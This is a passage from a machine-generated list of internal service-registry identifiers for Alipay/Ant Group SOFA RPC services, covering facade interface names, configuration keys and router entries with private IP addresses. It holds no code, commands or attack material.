RM","cn.com.antcloud.acprodapicore.facade.manageapi.JavaSdkManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fincoretechdss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:BarometerTemplateMng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.friendtab.FriendTabPutRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:afsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.73.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.191.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ipayment.service.facade.api.StagedPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkdepbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.healthCheckBossCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.inspect.service.InspectTaskResultManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_VIRTUALPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:RainyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxSelectAvailableSmids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.biz.donateRPC.api.CharitySellerinfoManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITPAY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mayibank.bkprocecore.oyz.facade.cross.deploy.DataDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_TRANSFER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_6400#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestprod.facade.settle.SettleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.RequireApprovalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.qualitycheck.IndustryCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.service.plan.UnifiedDistributionPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frboss.facade.api.ChartPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.common.prod.schedule.PcreditPlanPayTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.InsCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.SpProdAttrMapManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.biz.merchantactivity.online.manager.MerchantItemPurchaseActivityManager:1.0:merchantItemPurchaseActivityManagerOnlyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.product.IotProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.CodeChangeAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.order.query.AutoServiceOrderQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@csassistant#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.dchaincustomer.facade.api.absuser.AbsUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_masterAccRelAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Holox_SupervisorFingerprintCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.QsFinanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditchannelsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipricecore.common.service.facade.GroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.apipay.instportal.common.service.facade.BillOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:certifyAuditTaskCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trsbrain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SubjectServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.ecm.common.service.facade.api.EcmCharseTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.actrule.ActRuleGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FININFLUX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.InvestOpinionFundBriefUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:sign_sales_product_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.facade.QuestionGraphService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.139.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_CONTENT_NOTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iopencms.common.service.facade.api.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:stocksupervise@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue36#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolAppRuleQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.querymemberprodlog.facade.QueryMemberProdLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtraffic.common.service.facade.distribution.pool.api.DistributionPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.CategoryConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.UioUserLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SNAPSHOT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.SyncControlDRMResource.syncControlOpenValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrtcenter.common.service.facade.evaluation.QuestionAndSubjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.GuessYourProblemService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:seaviewroomtwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.apshopcenter.ApscCardTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CHARGE_MESSAGE_SENDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bk.compass.facade.api.fundflow.QueryClearingDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.FileAuthenticateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.basic.sync.SettleOrderStatusSynchronizeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.service.LifeServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.sentiment.PublicSentimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finslip.common.service.facade.notify.RemedyNotifyGzoneService:1.0:remedyFinCompose@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.GroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushHealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QualityCheckDataRuleTestFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.AlarmEventAnalyseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.open.facade.api.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.api.RuleRunner:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.biz.manager.openapi.DrmChangeControlResource.needDrmChangeControlIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequote.api.KlineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcpcs.common.service.facade.management.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_merchantActivityAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.operation.OpToolInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.psbp.common.service.medical.MedicalRegisteredInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promodmp.service.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.210.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.reading.common.service.facade.game.SpecialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_globalremitprod_task_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.artvcroom.common.service.facade.ArtvcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.load.api.ParmRemoteLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.common.service.facade.cashierorderquery.api.DepositOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.endpoint.dds.rpc.service.AntSchedulerJzCallBackRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebcore.common.facade.service.query.ContractBindQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchprod.module.merchant.facade.api.ShopQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.auth.AuthService:1.0:barAuth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskAsyncPredictionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.forbiddenPublishQuestion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-antcatkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbodmp.common.service.facade.api.MdatasyncCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.backend.RelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.RecruitMItemInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstrategy.common.service.facade.portfolio.PortfolioOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.com.service.integration.mobilecodec.CodeGenerateFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.nearby.NearbyAddressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:auditTaskFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.operator.facade.IsvOperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincapacity.biz.facade.GlobalTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_INSTANALYSIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcube.common.service.facade.page.SystemNoticeIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.hook.HookImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.socialopen.TaskOpenBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_ZHENGYUAN_DEV#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.giftprod.common.service.facade.inner.ShareInfoGzService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.biz.service.impl.test.LoadTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_packageSupportGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.biz.service.subsidy.api.SubsidyRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.common.dal.daointerface.UkeyUserRelationDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.ConclusionQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.datacontext.common.service.facade.limitcum.api.FcCumulateInitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.StdResultCode2ndQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchorder.orderdatacenter.facade.service.OrderDataUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.facade.activities.ChannelServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.batchfund.common.service.facade.file.api.FileProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotationcore.common.service.facade.api.quotation.StockRemindSendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:retryChainApplyTaskLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRANSFER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.0.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mychain.baas.logistic.finance.rpc.LFWaybillOrderRpc:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finfundbankcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.yunfengdie.busmapping.BusMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.clearingandsettlement.AccReconStmtSplitTaxFeeFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.HKCampService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.LambdaControlValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.manage.MsSpiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.InvUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.use.InsMktPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdatraffic.facade.shandie.MdatrafficShandieFacade:1.0:mdatraffic_MdatrafficShandieFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aap.common.service.facade.useranalysis.AnalysisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recruitcore_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.question.QuestionGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotationPlateRankingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linka.common.service.facade.GitHookFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.kbdatafactory.DataDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.IndirectMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.yebcore.common.facade.service.query.SpecialQuotaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.skipRedeemDecideOrder,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zskynet.facade.logmonitor.service.LogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.68.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.config.cache.RunningInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.common.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.GuidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:executionOrderMonitorExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.TmallGenieHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbill.facade.service.PcreditBillDelayRepayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.MenuFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlExtEscapeRuleString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_BATCHFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bremng.common.service.facade.ScopeProfileAccessor:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:webdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ipsponsorprod.biz.point.service.common.CommonPointService:1.0:consumeGoldPointService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.PartnerMergeActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.robot.InterfaceExecuteProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.2.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.sop.SopOperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.strategy.factory.feature.facade.FeatureAnalyzeServiceFacade:1.0:riskinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.ItemPermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityDailyReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.modelcenter:name=com.alipay.modelcenter.common.service.facade.ldc.SecurityLdcSwitchResource.switchZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.ZlcTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.TaskRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpcsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_BIZBILLING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dmeta.facade.virtual.VirtualDimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#